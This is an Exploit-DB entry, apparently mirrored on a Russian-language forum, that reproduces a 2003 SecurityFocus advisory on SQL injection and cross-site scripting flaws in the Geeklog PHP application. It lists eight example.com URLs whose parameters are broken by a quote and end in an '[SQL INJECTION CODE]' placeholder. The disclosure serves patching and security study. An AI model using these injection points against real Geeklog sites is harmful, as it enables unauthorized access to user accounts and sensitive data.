- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23193
- Проверка EDB
-
- Пройдено
- Автор
- LORENZO HERNANDEZ GARCIA-HIERRO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2003-09-29
Код:
source: https://www.securityfocus.com/bid/8718/info
Geeklog is prone to multiple vulnerabilities, including cross-site scripting and SQL injection issues. Exploitation of these issues could permit unauthorized access to user accounts and sensitive information.
Some of these issues may be related to previously documented vulnerabilities in Geeklog.
http://www.example.com/index.php?topic=te'st/[SQL INJECTION CODE]
http://www.example.com/forum/viewtopic.php?forum=1&showtopic=1'0/[SQL INJECTION
CODE]
http://www.example.com/staticpages/index.php?page=test'test/[SQL INJECTION CODE]
http://www.example.com/filemgmt/visit.php?lid=1'1'0/[SQL INJECTION CODE]
http://www.example.com/filemgmt/viewcat.php?cid='6/[SQL INJECTION CODE]
http://www.example.com/comment.php?type=filemgmt&cid=filemgmt-1'70/[SQL INJECTION
CODE]
http://www.example.com/comment.php?mode=display&sid=filemgmt-XXX&title=[SQL
INJECTION CODE]
http://www.example.com/filemgmt/singlefile.php?lid=17'/0/[SQL INJECTION CODE]- Источник
- www.exploit-db.com
